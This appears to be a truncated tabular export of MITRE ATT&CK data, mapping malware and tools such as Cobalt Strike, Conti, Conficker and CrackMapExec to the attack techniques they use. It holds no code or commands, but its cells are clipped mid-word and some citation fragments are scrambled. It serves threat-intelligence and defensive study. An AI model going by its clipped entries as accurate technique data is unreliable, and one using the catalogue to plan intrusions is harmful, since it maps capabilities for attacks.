S0154 Cobalt Stri malware--asoftware uses T1027 Obfuscatedattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1137.001Office Temattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1134.004Parent PIDattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1550.002Pass the H attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1059.001PowerShellattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1564.010Process Ar attack-pat technique [Cobalt St
S0154 Cobalt Stri malware--asoftware uses T1057 Process Di attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1055.012Process Hoattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1055 Process Injattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1572 Protocol T attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1001.003Protocol o attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1059.006Python attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1012 Query Regiattack-pat technique [Cobalt St
S0154 Cobalt Stri malware--asoftware uses T1620 Reflective attack-pat technique [Cobalt St
S0154 Cobalt Stri malware--asoftware uses T1021.001Remote Des attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1018 Remote Sysattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1218.011Rundll32 attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1021.002SMB/Windo attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1021.004SSH attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1029 Scheduled attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1113 Screen Capattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1003.002Security A attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1569.002Service Ex attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1518 Software Dattack-pat technique The [Cobalt
S0154 Cobalt Stri malware--asoftware uses T1132.001Standard Eattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1548.003Sudo and Sattack-pat technique [Cobalt St
S0154 Cobalt Stri malware--asoftware uses T1573.001Symmetric attack-pat technique [Cobalt St
S0154 Cobalt Stri malware--asoftware uses T1016 System Netattack-pat technique [Cobalt St
S0154 Cobalt Stri malware--asoftware uses T1049 System Netattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1007 System Serattack-pat technique [Cobalt St
S0154 Cobalt Stri malware--asoftware uses T1070.006Timestompattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1134.001Token Impeattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1059.005Visual Basiattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1071.001Web Protocattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1059.003Windows Cattack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1047 Windows M attack-pat technique [Cobalt Str
S0154 Cobalt Stri malware--asoftware uses T1021.006Windows Rattack-pat technique [Cobalt St
S0154 Cobalt Stri malware--asoftware uses T1543.003Windows Se attack-pat technique [Cobalt Str
S0338 Cobian RA malware-- software uses T1123 Audio Captattack-pat technique [Cobian RAT
S0338 Cobian RA malware-- software uses T1071.004DNS attack-pat technique [Cobian RAT
S0338 Cobian RA malware-- software uses T1056.001Keyloggingattack-pat technique [Cobian RAT
S0338 Cobian RA malware-- software uses T1547.001Registry Ruattack-pat technique [Cobian RAT
S0338 Cobian RA malware-- software uses T1113 Screen Capattack-pat technique [Cobian RAT
S0338 Cobian RA malware-- software uses T1132.001Standard Eattack-pat technique [Cobian RA
S0338 Cobian RA malware-- software uses T1125 Video Captattack-pat technique [Cobian RAT
S0338 Cobian RA malware-- software uses T1059.003Windows Cattack-pat technique [Cobian RA
S0369 CoinTicker malware-- software uses T1140 Deobfuscatattack-pat technique [CoinTicker
S0369 CoinTicker malware-- software uses T1553.001Gatekeeperattack-pat technique [CoinTicker
S0369 CoinTicker malware-- software uses T1564.001Hidden Fileattack-pat technique [CoinTicker
S0369 CoinTicker malware-- software uses T1105 Ingress Tooattack-pat technique [CoinTicker
S0369 CoinTicker malware-- software uses T1543.001Launch Ageattack-pat technique [CoinTicker
S0369 CoinTicker malware-- software uses T1027 Obfuscatedattack-pat technique [CoinTicker
S0369 CoinTicker malware-- software uses T1059.006Python attack-pat technique [CoinTicker
S0369 CoinTicker malware-- software uses T1059.004Unix Shell attack-pat technique [CoinTicker
S0369 CoinTicker malware-- software uses T1059.003Windows Cattack-pat technique [CoinTicker
S0126 ComRAT malware-- software uses T1573.002Asymmetricattack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1102.002Bidirectio attack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1027.010Command aOttack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1546.015Componentattack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1140 Deobfuscatattack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1055.001Dynamic-linattack-pat technique [ComRAT](ht
S0126 ComRAT malware-- software uses T1027.009Embeddedattack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1027.011Fileless St attack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1564.005Hidden Fil attack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1071.003Mail Protocattack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1036.004Masquerade attack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1112 Modify Regattack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1106 Native API attack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1027 Obfuscatedattack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1059.001PowerShellattack-pat technique [ComRAT](ht
S0126 ComRAT malware-- software uses T1012 Query Regiattack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1053.005Scheduled attack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1029 Scheduled attack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1518 Software Dattack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1124 System Timattack-pat technique [ComRAT](ht
S0126 ComRAT malware-- software uses T1071.001Web Protocattack-pat technique [ComRAT](h
S0126 ComRAT malware-- software uses T1059.003Windows Cattack-pat technique [ComRAT](h
S0244 Comnie malware--fsoftware uses T1119 Automatedattack-pat technique [Comnie](ht
S0244 Comnie malware--fsoftware uses T1102.002Bidirectio attack-pat technique [Comnie](ht
S0244 Comnie malware--fsoftware uses T1027.001Binary Padattack-pat technique [Comnie](ht
S0244 Comnie malware--fsoftware uses T1087.001Local Acco attack-pat technique [Comnie](h
S0244 Comnie malware--fsoftware uses T1027 Obfuscatedattack-pat technique [Comnie](ht
S0244 Comnie malware--fsoftware uses T1057 Process Di attack-pat technique [Comnie](ht
S0244 Comnie malware--fsoftware uses T1547.001Registry Ruattack-pat technique [Comnie](ht
S0244 Comnie malware--fsoftware uses T1018 Remote Sysattack-pat technique [Comnie](h
S0244 Comnie malware--fsoftware uses T1218.011Rundll32 attack-pat technique [Comnie](ht
S0244 Comnie malware--fsoftware uses T1518.001Security S attack-pat technique [Comnie](ht
S0244 Comnie malware--fsoftware uses T1547.009Shortcut Mattack-pat technique [Comnie](ht
S0244 Comnie malware--fsoftware uses T1573.001Symmetric attack-pat technique [Comnie](h
S0244 Comnie malware--fsoftware uses T1082 System Inf attack-pat technique [Comnie](ht
S0244 Comnie malware--fsoftware uses T1016 System Netattack-pat technique [Comnie](h
S0244 Comnie malware--fsoftware uses T1049 System Netattack-pat technique [Comnie](h
S0244 Comnie malware--fsoftware uses T1007 System Serattack-pat technique [Comnie](h
S0244 Comnie malware--fsoftware uses T1059.005Visual Basiattack-pat technique [Comnie](ht
S0244 Comnie malware--fsoftware uses T1071.001Web Protocattack-pat technique [Comnie](h
S0244 Comnie malware--fsoftware uses T1059.003Windows Cattack-pat technique [Comnie](ht
S0608 Conficker malware-- software uses T1562.001Disable or attack-pat technique [Conficker]
S0608 Conficker malware-- software uses T1568.002Domain Gen attack-pat technique [Conficker]
S0608 Conficker malware-- software uses T1210 Exploitatioattack-pat technique [Conficker]
S0608 Conficker malware-- software uses T1105 Ingress Tooattack-pat technique [Conficker]
S0608 Conficker malware-- software uses T1490 Inhibit Sy attack-pat technique [Conficker]
S0608 Conficker malware-- software uses T1112 Modify Regattack-pat technique [Conficker
S0608 Conficker malware-- software uses T1046 Network Seattack-pat technique [Conficker]
S0608 Conficker malware-- software uses T1027 Obfuscatedattack-pat technique [Conficker]
S0608 Conficker malware-- software uses T1547.001Registry Ruattack-pat technique [Conficker]
S0608 Conficker malware-- software uses T1091 Replicatio attack-pat technique [Conficker
S0608 Conficker malware-- software uses T1021.002SMB/Windo attack-pat technique [Conficker]
S0608 Conficker malware-- software uses T1124 System Timattack-pat technique [Conficker]
S0608 Conficker malware-- software uses T1543.003Windows Se attack-pat technique [Conficker]
S0591 ConnectWitool--8429 software uses T1059.001PowerShellattack-pat technique [ConnectWi
S0591 ConnectWitool--8429 software uses T1113 Screen Capattack-pat technique [ConnectWis
S0591 ConnectWitool--8429 software uses T1125 Video Captattack-pat technique [ConnectWis
S0575 Conti malware--4software uses T1486 Data Encryattack-pat technique [Conti](htt
S0575 Conti malware--4software uses T1140 Deobfuscatattack-pat technique [Conti](htt
S0575 Conti malware--4software uses T1055.001Dynamic-linattack-pat technique [Conti](htt
S0575 Conti malware--4software uses T1083 File and Di attack-pat technique [Conti](htt
S0575 Conti malware--4software uses T1490 Inhibit Sy attack-pat technique [Conti](ht
S0575 Conti malware--4software uses T1106 Native API attack-pat technique [Conti](htt
S0575 Conti malware--4software uses T1135 Network Shattack-pat technique [Conti](ht
S0575 Conti malware--4software uses T1027 Obfuscatedattack-pat technique [Conti](htt
S0575 Conti malware--4software uses T1057 Process Di attack-pat technique [Conti](htt
S0575 Conti malware--4software uses T1018 Remote Sysattack-pat technique [Conti](https://attack.mitre.o
S0575 Conti malware--4software uses T1021.002SMB/Windo attack-pat technique [Conti](htt
S0575 Conti malware--4software uses T1489 Service Stoattack-pat technique [Conti](htt
S0575 Conti malware--4software uses T1016 System Netattack-pat technique [Conti](htt
S0575 Conti malware--4software uses T1049 System Netattack-pat technique [Conti](ht
S0575 Conti malware--4software uses T1080 Taint Shar attack-pat technique [Conti](htt
S0575 Conti malware--4software uses T1059.003Windows Cattack-pat technique [Conti](htt
S0492 CookieMinmalware-- software uses T1027.010Command aOttack-pat technique [CookieMine
S0492 CookieMinmalware-- software uses T1496.001Compute Hiattack-pat technique [CookieMin
S0492 CookieMinmalware-- software uses T1555.003Credential attack-pat technique [CookieMine
S0492 CookieMinmalware-- software uses T1005 Data from attack-pat technique [CookieMin
S0492 CookieMinmalware-- software uses T1140 Deobfuscatattack-pat technique [CookieMin
S0492 CookieMinmalware-- software uses T1562.004Disable or attack-pat technique [CookieMine
S0492 CookieMinmalware-- software uses T1048.003Exfiltrati attack-pat technique [CookieMin
S0492 CookieMinmalware-- software uses T1083 File and Di attack-pat technique [CookieMine
S0492 CookieMinmalware-- software uses T1105 Ingress Tooattack-pat technique [CookieMine
S0492 CookieMinmalware-- software uses T1543.001Launch Ageattack-pat technique [CookieMine
S0492 CookieMinmalware-- software uses T1059.006Python attack-pat technique [CookieMine
S0492 CookieMinmalware-- software uses T1518.001Security S attack-pat technique [CookieMine
S0492 CookieMinmalware-- software uses T1539 Steal Web attack-pat technique [CookieMin
S0492 CookieMinmalware-- software uses T1059.004Unix Shell attack-pat technique [CookieMine
S0050 CosmicDukmalware-- software uses T1020 Automatedattack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1115 Clipboard attack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1555 Credential attack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1555.003Credential attack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1005 Data from attack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1039 Data from attack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1025 Data from attack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1048.003Exfiltrati attack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1068 Exploitatioattack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1083 File and Di attack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1056.001Keyloggingattack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1003.004LSA Secret attack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1114.001Local Emailattack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1053.005Scheduled attack-pat technique [CosmicDuk
S0050 CosmicDukmalware-- software uses T1113 Screen Capattack-pat technique [CosmicDuke
S0050 CosmicDukmalware-- software uses T1003.002Security A attack-pat technique [CosmicDuk
S0050 CosmicDukmalware-- software uses T1573.001Symmetric attack-pat technique [CosmicDuk
S0050 CosmicDukmalware-- software uses T1071.001Web Protocattack-pat technique [CosmicDuk
S0050 CosmicDukmalware-- software uses T1543.003Windows Se attack-pat technique [CosmicDuk
S0614 CostaBrick malware-- software uses T1027.001Binary Padattack-pat technique [CostaBrick
S0614 CostaBrick malware-- software uses T1140 Deobfuscatattack-pat technique [CostaBrick
S0614 CostaBrick malware-- software uses T1105 Ingress Tooattack-pat technique [CostaBric
S0614 CostaBrick malware-- software uses T1106 Native API attack-pat technique [CostaBrick
S0614 CostaBrick malware-- software uses T1055 Process Injattack-pat technique [CostaBric
S0614 CostaBrick malware-- software uses T1027.002Software Pattack-pat technique [CostaBric
S1155 Covenant tool--05fb software uses T1573.002Asymmetricattack-pat technique [Covenant](
S1155 Covenant tool--05fb software uses T1218.004InstallUtil attack-pat technique [Covenant](
S1155 Covenant tool--05fb software uses T1218.005Mshta attack-pat technique [Covenant](
S1155 Covenant tool--05fb software uses T1571 Non-Standaattack-pat technique [Covenant](
S1155 Covenant tool--05fb software uses T1059.001PowerShellattack-pat technique [Covenant](
S1155 Covenant tool--05fb software uses T1218.010Regsvr32 attack-pat technique [Covenant](
S1155 Covenant tool--05fb software uses T1082 System Inf attack-pat technique [Covenant](
S1155 Covenant tool--05fb software uses T1071.001Web Protocattack-pat technique [Covenant]
S1155 Covenant tool--05fb software uses T1059.003Windows Cattack-pat technique [Covenant]
S1155 Covenant tool--05fb software uses T1047 Windows M attack-pat technique [Covenant](
S0046 CozyCar malware--esoftware uses T1102.002Bidirectio attack-pat technique [CozyCar](h
S0046 CozyCar malware--esoftware uses T1027.013Encrypted/attack-pat technique The payload
S0046 CozyCar malware--esoftware uses T1003.001LSASS Memattack-pat technique [CozyCar](h
S0046 CozyCar malware--esoftware uses T1547.001Registry Ruattack-pat technique One persis
S0046 CozyCar malware--esoftware uses T1036.003Rename Sys attack-pat technique The [CozyCa
S0046 CozyCar malware--esoftware uses T1218.011Rundll32 attack-pat technique The [CozyCa
S0046 CozyCar malware--esoftware uses T1053.005Scheduled attack-pat technique One persist
S0046 CozyCar malware--esoftware uses T1003.002Security A attack-pat technique Password st
S0046 CozyCar malware--esoftware uses T1518.001Security S attack-pat technique The main [C
S0046 CozyCar malware--esoftware uses T1082 System Inf attack-pat technique A system in
S0046 CozyCar malware--esoftware uses T1497 Virtualiza attack-pat technique Some versio
S0046 CozyCar malware--esoftware uses T1071.001Web Protocattack-pat technique [CozyCar](h
S0046 CozyCar malware--esoftware uses T1059.003Windows Cattack-pat technique A module i
S0046 CozyCar malware--esoftware uses T1543.003Windows Se attack-pat technique One persist
S0488 CrackMapEtool--c48 software uses T1053.002At attack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1110 Brute Forc attack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1087.002Domain Acattack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1069.002Domain Grattack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1083 File and Di attack-pat technique [CrackMapEx
S0488 CrackMapEtool--c48 software uses T1003.004LSA Secret attack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1112 Modify Regattack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1003.003NTDS attack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1135 Network Shattack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1550.002Pass the H attack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1110.001Password Gattack-pat technique [CrackMapEx
S0488 CrackMapEtool--c48 software uses T1201 Password Pattack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1110.003Password Sattack-pat technique [CrackMapEx
S0488 CrackMapEtool--c48 software uses T1059.001PowerShellattack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1018 Remote Sysattack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1003.002Security A attack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1082 System Inf attack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1016 System Netattack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1049 System Netattack-pat technique [CrackMapE
S0488 CrackMapEtool--c48 software uses T1047 Windows M attack-pat technique [CrackMapE
S1023 CreepyDrivmalware-- software uses T1550.001Applicatio attack-pat technique [CreepyDri
S1023 CreepyDrivmalware-- software uses T1102.002Bidirectio attack-pat technique [CreepyDri
S1023 CreepyDrivmalware-- software uses T1005 Data from attack-pat technique [CreepyDri
S1023 CreepyDrivmalware-- software uses T1567.002Exfiltratio attack-pat technique [CreepyDriv
S1023 CreepyDrivmalware-- software uses T1083 File and Di attack-pat technique [CreepyDriv
S1023 CreepyDrivmalware-- software uses T1105 Ingress Tooattack-pat technique [CreepyDri
S1023 CreepyDrivmalware-- software uses T1059.001PowerShellattack-pat technique [CreepyDri
S1023 CreepyDrivmalware-- software uses T1071.001Web Protocattack-pat technique [CreepyDri
S1024 CreepySnaimalware--dsoftware uses T1078.002Domain Acattack-pat technique [CreepySnai
S1024 CreepySnaimalware--dsoftware uses T1041 Exfiltratio attack-pat technique [CreepySnai
S1024 CreepySnaimalware--dsoftware uses T1059.001PowerShellattack-pat technique [CreepySna
S1024 CreepySnaimalware--dsoftware uses T1132.001Standard Eattack-pat technique [CreepySnai
S1024 CreepySnaimalware--dsoftware uses T1016 System Netattack-pat technique [CreepySna
S1024 CreepySnaimalware--dsoftware uses T1033 System Own attack-pat technique [CreepySna
S1024 CreepySnaimalware--dsoftware uses T1071.001Web Protocattack-pat technique [CreepySna
S0115 Crimson malware--3software uses T1123 Audio Captattack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1555.003Credential attack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1005 Data from attack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1025 Data from attack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1140 Deobfuscatattack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1041 Exfiltratio attack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1070.004File Deleti attack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1083 File and Di attack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1105 Ingress Tooattack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1056.001Keyloggingattack-pat technique [Crimson](
S0115 Crimson malware--3software uses T1114.001Local Emailattack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1112 Modify Regattack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1095 Non-Applicattack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1120 Peripheral attack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1057 Process Di attack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1012 Query Regiattack-pat technique [Crimson](
S0115 Crimson malware--3software uses T1547.001Registry Ruattack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1091 Replicatio attack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1113 Screen Capattack-pat technique [Crimson](
S0115 Crimson malware--3software uses T1518.001Security S attack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1082 System Inf attack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1614 System Locattack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1016 System Netattack-pat technique [Crimson](
S0115 Crimson malware--3software uses T1033 System Own attack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1124 System Timattack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1497.003Time Basedattack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1125 Video Captattack-pat technique [Crimson](
S0115 Crimson malware--3software uses T1071.001Web Protocattack-pat technique [Crimson](h
S0115 Crimson malware--3software uses T1059.003Windows Cattack-pat technique [Crimson](
S0235 CrossRAT malware-- software uses T1083 File and Di attack-pat technique [CrossRAT](
S0235 CrossRAT malware-- software uses T1543.001Launch Ageattack-pat technique [CrossRAT]
S0235 CrossRAT malware-- software uses T1547.001Registry Ruattack-pat technique [CrossRAT](
S0235 CrossRAT malware-- software uses T1113 Screen Capattack-pat technique [CrossRAT](
S0235 CrossRAT malware-- software uses T1547.013XDG Autostattack-pat technique [CrossRAT](
S0538 Crutch malware-- software uses T1560.001Archive viaattack-pat technique [Crutch](ht
S0538 Crutch malware-- software uses T1119 Automatedattack-pat technique [Crutch](ht
S0538 Crutch malware-- software uses T1020 Automatedattack-pat technique [Crutch](ht
S0538 Crutch malware-- software uses T1102.002Bidirectio attack-pat technique [Crutch](h
S0538 Crutch malware-- software uses T1574.001DLL Searchattack-pat technique [Crutch](ht
S0538 Crutch malware-- software uses T1005 Data from attack-pat technique [Crutch](ht
S0538 Crutch malware-- software uses T1025 Data from attack-pat technique [Crutch](ht
S0538 Crutch malware-- software uses T1041 Exfiltratio attack-pat technique [Crutch](ht
S0538 Crutch malware-- software uses T1567.002Exfiltratio attack-pat technique [Crutch](ht
S0538 Crutch malware-- software uses T1008 Fallback C attack-pat technique [Crutch](ht
S0538 Crutch malware-- software uses T1074.001Local Data attack-pat technique [Crutch](h
S0538 Crutch malware-- software uses T1036.004Masquerade attack-pat technique [Crutch](ht
S0538 Crutch malware-- software uses T1120 Peripheral attack-pat technique [Crutch](h
S0538 Crutch malware-- software uses T1053.005Scheduled attack-pat technique [Crutch](ht
S0538 Crutch malware-- software uses T1071.001Web Protocattack-pat technique [Crutch](h
S0498 Cryptoisticmalware-- software uses T1005 Data from attack-pat technique [Cryptoisti
S0498 Cryptoisticmalware-- software uses T1573 Encrypted attack-pat technique [Cryptoisti
S0498 Cryptoisticmalware-- software uses T1070.004File Deleti attack-pat technique [Cryptoisti
S0498 Cryptoisticmalware-- software uses T1083 File and Di attack-pat technique [Cryptoisti
S0498 Cryptoisticmalware-- software uses T1105 Ingress Tooattack-pat technique [Cryptoisti
S0498 Cryptoisticmalware-- software uses T1095 Non-Applicattack-pat technique [Cryptoisti
S0498 Cryptoisticmalware-- software uses T1033 System Own attack-pat technique [Cryptoisti
S0625 Cuba malware-- software uses T1134 Access Tokattack-pat technique [Cuba](htt
S0625 Cuba malware-- software uses T1486 Data Encryattack-pat technique [Cuba](http
S0625 Cuba malware-- software uses T1070.004File Deleti attack-pat technique [Cuba](htt
S0625 Cuba malware-- software uses T1083 File and Di attack-pat technique [Cuba](http
S0625 Cuba malware-- software uses T1564.003Hidden Wi attack-pat technique [Cuba](htt
S0625 Cuba malware-- software uses T1105 Ingress Tooattack-pat technique [Cuba](http
S0625 Cuba malware-- software uses T1056.001Keyloggingattack-pat technique [Cuba](htt
S0625 Cuba malware-- software uses T1036.005Match Legiattack-pat technique [Cuba](http
S0625 Cuba malware-- software uses T1106 Native API attack-pat technique [Cuba](http
S0625 Cuba malware-- software uses T1135 Network Shattack-pat technique [Cuba](htt
S0625 Cuba malware-- software uses T1027 Obfuscatedattack-pat technique [Cuba](http
S0625 Cuba malware-- software uses T1059.001PowerShellattack-pat technique [Cuba](htt
S0625 Cuba malware-- software uses T1057 Process Di attack-pat technique [Cuba](htt
S0625 Cuba malware-- software uses T1620 Reflective attack-pat technique [Cuba](htt
S0625 Cuba malware-- software uses T1489 Service Stoattack-pat technique [Cuba](http
S0625 Cuba malware-- software uses T1027.002Software Pattack-pat technique [Cuba](htt
S0625 Cuba malware-- software uses T1082 System Inf attack-pat technique [Cuba](http
S0625 Cuba malware-- software uses T1614.001System Lanattack-pat technique [Cuba](http
S0625 Cuba malware-- software uses T1016 System Netattack-pat technique [Cuba](htt
S0625 Cuba malware-- software uses T1049 System Netattack-pat technique [Cuba](http
S0625 Cuba malware-- software uses T1007 System Serattack-pat technique [Cuba](htt
S0625 Cuba malware-- software uses T1059.003Windows Cattack-pat technique [Cuba](http
S0625 Cuba malware-- software uses T1543.003Windows Se attack-pat technique [Cuba](htt
S1153 Cuckoo Stemalware-- software uses T1059.002AppleScripattack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1217 Browser Inattack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1140 Deobfuscatattack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1027.013Encrypted/attack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1041 Exfiltratio attack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1083 File and Di attack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1056.002GUI Input attack-pat technique [Cuckoo Stealer](https://atta
S1153 Cuckoo Stemalware-- software uses T1553.001Gatekeeperattack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1564.001Hidden Fileattack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1555.001Keychain attack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1543.001Launch Ageattack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1569.001Launchctl attack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1074.001Local Data attack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1036.005Match Legiattack-pat technique [Cuckoo Stealer](https://atta
S1153 Cuckoo Stemalware-- software uses T1095 Non-Applicattack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1647 Plist File Mattack-pat technique [Cuckoo Stealer](https://atta
S1153 Cuckoo Stemalware-- software uses T1057 Process Di attack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1113 Screen Capattack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1518 Software Dattack-pat technique [Cuckoo
(Citation:Stealer](https://atta
SentinelOne Cucko
S1153 Cuckoo Stemalware-- software uses T1027.008Stripped P attack-pat technique
S1153 Cuckoo Stemalware-- software uses T1082 System Inf attack-pat technique [Cuckoo St
S1153 Cuckoo Stemalware-- software uses T1614.001System Lanattack-pat technique [Cuckoo
[Cuckoo Ste
Stealer](https://atta
S1153 Cuckoo Stemalware-- software uses T1614 System Locattack-pat technique
S1153 Cuckoo Stemalware-- software uses T1033 System Own attack-pat technique [Cuckoo St
S1153 Cuckoo Stemalware-- software uses T1059.004Unix Shell attack-pat technique [Cuckoo Ste
S1153 Cuckoo Stemalware-- software uses T1071.001Web Protocattack-pat technique [Cuckoo Ste
S0687 Cyclops Blimalware-- software uses T1573.002Asymmetricattack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1542.002Componentattack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1005 Data from attack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1140 Deobfuscatattack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1562.004Disable or attack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1041 Exfiltratio attack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1083 File and Di attack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1105 Ingress Tooattack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1559 Inter-Proc attack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1036.005Match Legiattack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1090.003Multi-hop attack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1106 Native API attack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1132.002Non-Standaattack-pat technique [Cyclops B
S0687 Cyclops Blimalware-- software uses T1571 Non-Standaattack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1057 Process Di attack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1572 Protocol T attack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1037.004RC Scripts attack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1082 System Inf attack-pat technique [Cyclops Bl
